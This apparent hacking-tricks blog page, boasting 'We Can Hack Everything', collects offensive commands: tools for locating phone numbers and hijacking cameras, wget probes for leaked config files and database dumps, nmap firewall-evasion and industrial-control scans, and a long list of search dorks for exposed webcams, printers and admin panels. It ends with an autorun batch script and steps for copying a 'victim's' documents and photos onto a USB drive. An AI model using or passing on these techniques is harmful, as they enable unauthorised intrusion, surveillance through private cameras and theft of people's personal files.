Privacy & Security No Such Things Exists in digital World, We Can Hack Everything locate any phone number
root@kali:~#apt-get update
root@kali:~#apt-get install git
root@kali:~#apt-get install pip
root@kali:~#apt install python3
root@kali:~#git clone https://github.com/akashblackhat/Live-location.py.git
root@kali:~#ls
root@kali:~#cd Live-location.py
root@kali:~#python3 Live-location.py
Download Web Page to File with telnet
root@kali:~#telnet website 80
Trying website...
Connected to website.
Escape character is '^]'.
GET /index.html
Inspecting HTTPS (TLS, SSL) certificates from the command line.
root@kali:~#openssl s_client -showcerts -connect website:443
root@kali:~#curl -vvI https://website
root@kali:~#nmap -p 443 --script ssl-cert website
See all connections
root@kali:~#netstat ss |more
Subdomain Hack trick perl script code
root@kali:~#cpan make LWP::Protocol::https
Install this module with CPAN and with make and there were some errors. also tried to make a forced install of now it is in list of installed modules show
but the script still writes 501 Protocol scheme https is not supported not installed
Fix try install
Fedora 20
sudo yum install perl-LWP-Protocol-https perl-Crypt-SSLeay
RedHat
sudo yum install perl-Crypt-SSLeay
Debian, Ubuntu
sudo apt-get install libcrypt-ssleay-perl
Arch Linux, Manjaro
sudo pacman -S perl-lwp-protocol-https
USE Example
copy the code save like Subdomain.pl
root@kali:~# perl Subdomain.pl <target> | more
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
my $domain = shift or die "Usage: $0 domain.com\n";
my $ua = LWP::UserAgent->new;
my $response = $ua->get("http://api.hackertarget.com/hostsearch/?q=$domain");
if ($response->is_success) {
my $result = $response->decoded_content;
print "$result\n";
} else {
die $response->status_line;
}
CAM HACK TRICKS
root@kali:~# apt install git python3
root@kali:~# git clone https://github.com/AngelSecurityTeam/Cam-Hackers
root@kali:~# cd Cam-Hackers
root@kali:~/Cam-Hackers# pip install -r requirements.txt
root@kali:~/Cam-Hackers# python3 cam-hackers.py
Zaproxy trick
root@kali:~# apt install zaproxy tor
root@kali:~# service tor start
root@kali:~# proxychains owasp-zap -addoninstallall -quickurl <target>
Phoneinfoga install
root@kali:~# curl -sSL https://raw.githubusercontent.com/sundowndev/PhoneInfoga/master/support/scripts/install | bash
root@kali:~# sudo mv ./phoneinfoga /usr/bin/phoneinfoga
root@kali:~# phoneinfoga serve
Open http://127.0.0.1:5000/
Install Spiderfoot
root@kali:~# apt install spiderfoot
This package contains an open source intelligence (OSINT) automation tool. Its goal is to automate the process of gathering intelligence about a given target, which may be an IP address, domain name, hostname, network subnet, ASN, e-mail address or person’s name.
SpiderFoot can be used offensively, i.e. as part of a black-box penetration test to gather information about the target, or defensively to identify what information you or your organisation are freely providing for attackers to use against you.
Spiderfoot Example
root@kali:~# spiderfoot -l 127.0.0.1:5001
Spiderfoot Example TOR
root@kali:~# tor --SocksPort 9050 --ControlPort 9051
Hacking with wget Use usb key
root@kali:~#wget http://website/server-status
root@kali:~#wget http://website/sftp-config.json
root@kali:~#wget http://website/app/etc/local.xml
root@kali:~#wget http://website/.git/config
root@kali:~#wget http://website/.wp-config.php.swp
root@kali:~#wget http://website/%23wp-config.php%23
root@kali:~#wget http://website/wp-config.php~
root@kali:~#wget http://website/dump.sql
root@kali:~#wget -dnv http://website/sitemap.xml
root@kali:~#wget --random-wait -r -p -e robots=off -U mozilla http://website/
root@kali:~#wget --spider -o wget.log -e robots=off --wait 1 -r -p http://website
root@kali:~#wget -b -c --tries=NUMBER http://website
root@kali:~#wget -b --limit-rate=30 -np -N -m -nd --accept=LIST --wait=5 http://website/
root@kali:~#wget -r -H --convert-links --level=NUMBER --user-agent=AGENT http://website/
root@kali:~#wget --http-user=USER --http-password=PASS http://website/
First, create a text file of all the URLs you want to download using wget and call it wget_downloads.txt. Then to download URLs in bulk, type in this command
root@kali:~#wget -rH -p -dnv -i wget_downloads.txt
root@kali:~#wget -E -rH -p --no-check-certificate -i -dnv http://website/
root@kali:~#wget http://192.168.1.99//proc/kcore | struny | nano
Nmap Tricks
ARP ping scan
nmap -sn -PR [Target IP Address/Range of IP addresses]
UDP ping scan
A UDP response means that the host is active. If the target host is offline or unreachable, various error messages such as “host/network unreachable” or “TTL exceeded” could be returned.
nmap -sn -PU [Target IP Address/Range of IP addresses]
ICMP ECHO ping scan
The ICMP ECHO ping scan involves sending ICMP ECHO requests to a host. If the target host is alive, it will return an ICMP ECHO reply. This scan is useful for locating active devices or determining if the ICMP is passing through a firewall.
nmap -sn -PE [Target IP Address/Range of IP addresses]
Alternative to ICMP ECHO ping scan: ICMP Timestamp and Address Mask Ping Scan
ICMP timestamp ping scan
nmap -sn -PP [Target IP Address/Range of IP addresses]
ICMP address mask ping scan
nmap -sn -PM [Target IP Address/Range of IP addresses]
TCP ACK Ping Scan
This technique sends empty TCP ACK packets to the target host; an RST response means that the host is active.
nmap -sn -PA [Target IP Address/Range of IP addresses]
IP Protocol Ping Scan
This technique sends different probe packets of different IP protocols to the target host, any response from any probe indicates that a host is active.
nmap -sn -PO [Target IP Address/Range of IP addresses]
TCP connect/full open scan
nmap -sT -v [Target IP Address/Range of IP addresses]
Stealth scan/TCP half-open scan
This scanning technique can be used to bypass firewall rules, logging mechanisms, and hide under network traffic.
nmap -sS -v [Target IP Address/Range of IP addresses]
Xmas scan
Sends a TCP frame to a target system with FIN, URG, and PUSH flags set. If the target has opened the port, then you will receive no response from the target system. If the target has closed the port, then you will receive a target system reply with an RST.
nmap -sX -v [Target IP Address/Range of IP addresses]
TCP Maimon scan
FIN/ACK probe is sent to the target; if there is no response, then the port is Open|Filtered, but if the RST packet is sent as a response, then the port is closed.
nmap -sM -v [Target IP Address/Range of IP addresses]
ACK flag probe scan
Sends an ACK probe packet with a random sequence number; no response implies that the port is filtered (stateful firewall is present), and an RST response means that the port is not filtered.
nmap -sA -v [Target IP Address/Range of IP addresses]
UDP scan
Uses UDP protocol instead of the TCP. There is no three-way handshake for the UDP scan. It sends UDP packets to the target host; no response means that the port is open. If the port is closed, an ICMP port unreachable message is received.
nmap -sU -v [Target IP Address/Range of IP addresses]
IDLE/IPID Header Scan / Zombie Scan
A TCP port scan method that can be used to send a spoofed source address to a computer to discover what services are available.
nmap -sI -v [Target IP Address/Range of IP addresses]
SCTP COOKIE ECHO Scan
A COOKIE ECHO chunk is sent to the target host; no response implies that the port is open and ABORT Chunk response means that the port is closed.
nmap -sZ -v [Target IP Address/Range of IP addresses]
Ping Sweep Scan
Discover the available hosts and their IP and MAC addresses, but no information about the ports.
nmap -sP [Target IP Address/Range of IP addresses]
Display the open ports and services running
nmap -T4 -A -v [Target IP Address/Range of IP addresses]
-T4: Specifies setting time template (0-5). -A: Specifies setting ACK flag.
smb-os-discovery
Attempts to determine the OS, computer name, domain, workgroup, and current time over the SMB protocol
nmap --script smb-os-discovery.nse [Target IP Address/Range of IP addresses]
NetBIOS enumeration
nmap -sV -v --script nbstat.nse [Target IP Address/Range of IP addresses]
Http enum - enumerate the applications, directories, and files in a web server
nmap -sV --script http-enum [Target IP Address/Range of IP addresses]
hostmap-bfk
nmap --script hostmap-bfk -script-args hostmap-bfk.prefix=hostmap- [Target IP Address/Range of IP addresses]
Http trace
Uses the TRACE method by sending an HTTP TRACE request that shows if the method is enabled or not
nmap --script http-trace -d [Target IP Address/Range of IP addresses]
Http frontpage login
nmap [Target IP Address/Range of IP addresses] -p 80 --script = http-frontpage-login
Http passwd
nmap --script http-passwd --script-args http-passwd.root =/ [Target IP Address/Range of IP addresses]
Check whether Web Application Firewall is configured on the target host or domain
nmap -p80 --script http-waf-detect [Target IP Address/Range of IP addresses]
Bypassing firewall/IDS
Fragment packets
Send fragmented probe packets to the intended target, which re-assembles it after receiving all the fragments.
nmap -f [Target IP Address/Range of IP addresses]
Source port manipulation
Manipulating actual port numbers with common port numbers to evade IDS/firewall (sometimes, firewall is configured to allow packets from well-known ports like HTTP, DNS, FTP, etc.).
nmap -g 80 [Target IP Address/Range of IP addresses]
Set number of Maximum Transmission Unit (MTU)
This technique evades the filtering and detection mechanism enabled in the target machine.
nmap -mtu 8 [Target IP Address/Range of IP addresses]
Decoy
Generating or manually specifying IP addresses of the decoys to evade IDS/firewall. Nmap automatically generates a random number of decoys for the scan and randomly positions the real IP address between the decoy IP addresses.
-D: performs a decoy scan. RND: generates a random and non-reserved IP addresses.
nmap -D RND:10 [Target IP Address/Range of IP addresses]
Send the binary data as payload
nmap [Target IP Address/Range of IP addresses] --data 0xdeadbeef
Send string data as payload
nmap [Target IP Address/Range of IP addresses] --data-string "dummy string"
Append the number of random data bytes to most of the packets sent without any protocol-specific payloads
nmap --data-length 5 [Target IP Address/Range of IP addresses]
Scan in random order
nmap --randomize-hosts [Target IP Address/Range of IP addresses]
Send the packets with bad or bogus TCP/UPD checksums
nmap --badsum [Target IP Address/Range of IP addresses]
Send the packets with bad or bogus TCP/UPD checksums
nmap --badsum [Target IP Address/Range of IP addresses]
Scanning for vulneabilities
Identify the IPv6 capabilities of a device
nmap -6 -n -Pn -sSU -pT:0-65535,U:0-65535 -v -A -oX [NAME] [Target IP Address/Range of IP addresses]
Check for open TCP and UDP services and ports
nmap -n -Pn -sSU -pT:0-65535,U:0-65535 -v -A -oX [NAME] [Target IP Address/Range of IP addresses]
Scan for a specific IP address
nmap -n -Pn -sS -pT:0-65535 -v -A -oX [Target IP Address/Range of IP addresses]
Scanning ICS/SCADA systems
Identifying HMI systems
nmap -Pn -sT -p 46824 [Target IP address/Range of IP addresses]
Identifyng open ports and services
nmap -Pn -sT --scan-delay 1d --mac-parallelism 1 -p [port list] [Target IP address/Range of IP addresses]
Scanning siemens SIMATIC S7 PLCs
nmap -Pn -sT -p 102 --script s7-info [Target IP address/Range of IP addresses]
Scanning ethernet/IP devices
nmap -Pn -sU -p 44818 --script enip-info [Target IP address/Range of IP addresses]
Scanning modbus devices
nmap -Pn -sT -p 502 --script modbus-discover [Target IP address/Range of IP addresses]
Scanning BACnet devices
nmap -Pn -sU -p 47808 --script bacnet-info [Target IP address/Range of IP addresses]
Scanning Niagara Fox devices
nmap -Pn -sT -p 1911,4911 --script fox-info [Target IP address/Range of IP addresses]
Scanning Omron PLC devices
nmap -Pn -sT -p 9600 --script omron-info [Target IP address/Range of IP addresses]
Scanning PCWorx devices
nmap -Pn -sT -p 1962 --script pcworx-info [Target IP address/Range of IP addresses]
Scanning ProConOS devices
nmap -Pn -sT -p 20547 --script proconos-info [Target IP address/Range of IP addresses]
Protection
Promiscuous detection
nmap --script=sniffer-detect [Target IP Address/Range of IP addresses]
🌎
inurl:login.html intitle:"GPON Home Gateway"
inurl:"portal.mwsl" "Status"
intitle:"D-LINK SYSTEMS, INC. | Web File Access : Login"
"Account" "Password" "All rights reserved" intitle:"HG8245"
intitle:"IP Webcam" inurl:"/greet.html"
inurl:login.html intitle:"Archer C7"
inurl:dtm.html intitle:1747-L551
site:*/dyn_sensors.htm "ID"
inurl:/Jview "zoom"
AXIS Camera exploit
intitle:"NetCamSC*"
"System" + "Toner" + "Input Tray" + "Output Tray" inurl:cgi
intitle:"NetCamXL*"
intitle:"Agent web client: Phone Login"
inurl:/Jview.htm + intext:"Zoom :"
intext:"Connection" AND "Network name" AND " Cisco Meraki cloud" AND "Security Appliance details"
"change the Administrator Password." intitle:"HP LaserJet" -pdf
inurl: inurl:"view.shtml" ext:shtml
inurl:"view.shtml" "camera"
inurl:"/cgi-bin/guestimage.html" "Menu"
inurl:"view.shtml" "Network"
inurl:/Jview.htm + "View Video - Java Mode"
inurl:/homej.html?
inurl: 1051/viewer/live/index.html?lang=en
inurl:/index.html?size=2&mode=4
intitle:"NetCamSC*" | intitle:"NetCamXL*" inurl:index.html
inurl:set_config_password.html
inurl:/8080 "windows" "live view"
inurl:"webArch/mainFrame.cgi" + "Web Image Monitor"
"Pop-up" + "Live Image" inurl:index.html
inurl:"live/cam.html"
inurl:"/viewer/live.html"
inurl:/CgiStart?page
inurl:"/viewer/live/index.html"
intitle:"Rockwell Automation" inurl:"index.html" "Device Name"
inurl:8080/view/viewer_index.shtml?id= -site:*.com
intitle:"Miniweb Start Page"
inurl:/presentation/html/top/index.html
allintitle:"Welcome to the Web-Based Configurator"
inurl:"view.shtml" "Network Camera"
intitle:"Tuxedo Connected Controller"
inurl:/config/cam_portal.cgi "Panasonic"
inurl:.*eservices/login
"Camera Live Image" inurl:"guestimage.html"
intitle:"UPS Status" "Status" inurl:/host
intitle:"webcam" inurl:login
"HP LaserJet" inurl:"SSI/index.htm"
inurl:8081/ "Pan, Tilt & Zoom"
inurl:axis-cgi/mjpg/video swf
inurl:/home/homej.html
intext:"Frame rate" inurl:/home/homej.html
intext:"Device Name" | intext:"Host Name" inurl:mainFrame.cgi
inurl:"/general/status.html"
inurl:axis-cgi/jpg
inurl:/ViewerFrame? intitle:"Network Camera NetworkCamera"
inurl /view.shtml intext:"Airport"
intitle:"SFXAdmin - sfx_global" intext:"Login Form"
inurl:/sws/index.html
inurl:/jobq.htm AND intext:"ApeosPort-V"
inurl:/base/main_login.html intext:"Login"
inurl:index.shtml
allinurl:top.htm?Currenttime
intitle:"HP ALM" "Application Lifecycle Management" inurl:/qcbin/ -ext:PDF
intitle:"WEBCAM 7 " -inurl:/admin.html
site:*/EWS/Exchange.asmx
inurl:/db.php?path_local=
inurl:/gmap.php?id=
intitle:"WeatherLinkIP Configuration"
intitle:"Internet Services" inurl:default.htm intext:"FUJI XEROX"
intitle:"Kyocera Command Center" inurl:index.htm
inurl:8080/dashboard.php
inurl:8080/dashboard intitle:Graphite Dashboard
inurl:/index.htm intext:"Oki Data Corporation"
inurl:mainFrame.cgi intext:"RICOH"
inurl:/?MAIN=DEVICE intitle:TopAccess intext:Device
inurl:/main.html intext:SHARP AND intext:MX-*
inurl:sws/index.html AND intext:"Model Name" AND intext:"Serial Number"
inurl:/dana/home/ filetype:cgi
inurl:/dana-cached/sc/
intitle:"index of" "cvsweb.cgi"
inurl:SSI/index.htm
inurl:./sws/index.sws
inurl:/frameprop.htm
inurl:"/English/pages_WinUS/" AND intitle:"Top page"
intitle:"Printer Status" AND inurl:"/PrinterStatus.html"
intitle:("Solr Admin") AND intext:("Dashboard" AND "Corporation")
inurl:axis-cgi/mjpg/video.cgi
inurl:8000 intext:"Copyright CANON INC. 2012"
inurl:cgistart
inurl:view.shtml
intitle:NetworkCamera intext:"Pan / Tilt" inurl:ViewerFrame
inurl:/live.htm intext:"M-JPEG"|"System Log"|"Camera-1"|"View Control"
intitle:("Solr admin page") AND intext:("Make a Query")
inurl:/HDDReplay.html
intitle:"webcamXP 5" inurl:8080 'Live'
intext:"EWS Data Collection and Use"
inurl:hp/device/deviceinformation
intitle:ThingsBoard inurl:8080/dashboard
filetype:psp intitle:"Motorola - FX9500"
inurl:"view/index.shtml"
inurl:"MultiCameraFrame?Mode=Motion"
"VB Viewer" inurl:/viewer/live/ja/live.html
intitle:"IP CAMERA Viewer" intext:"setting | Client setting"
inurl:"nobody/loginQuick.htm"
site:*/cgi-bin/webproc intext:"username"
inurl:/swagger/index.html
intext:"Security is Off" intitle:"Namenode information"
"Firmware Version" intitle:"iLO" ProLiant Login -hpe.com -update
intitle:rsview32 ext:asp
intitle:"WSO2 Management Console"
intitle:"Home - Mongo Express"
inurl:"8080/dashboard/" intitle:"Dashboard"
inurl:"/index.php?enter=guest"
inurl:CGI/Java/Serviceability?adapter=device.statistics.device
intitle:"Marshall VS Server"
intext:{{szErrorTip}} inurl:/doc/page/login.asp
intitle:"openshift web console" inurl:console inurl:/console
inurl:"/hp_login.html"
inurl:webArch/mainFrame filetype:cgi intext:"Web Image Monitor"
intitle:"VideoEdge Admin Interface"
USB HACK TRICK
Step 1: Open new Notepad File and type code given below and save as autorun.inf
[autorun]
open=new.bat
icon=new.bat,0
Step 2: Open another new Notepad File and type code given below and save as new.bot
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y /g
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\all\vids"
%backupcmd% "%USERPROFILE%\Download" "%drive%\all\Download"
%backupcmd% "%USERPROFILE%\Desktop" "%drive%\all\Desktop"
%backupcmd% "%USERPROFILE%\Music" "%drive%\all\Music"
%backupcmd% "%USERPROFILE%\Documents" "%drive%\all\Documents"
@echo off
Step 3: Paste both files new.bat & autorun.inf in your USB Drive
Step 4: Insert the USB drive into victims computer. Once you insert it, you will get all the data from victims computer. If it doesn’t work, simply open the Pendrive and double click on new.bat, the data will copies successfully.
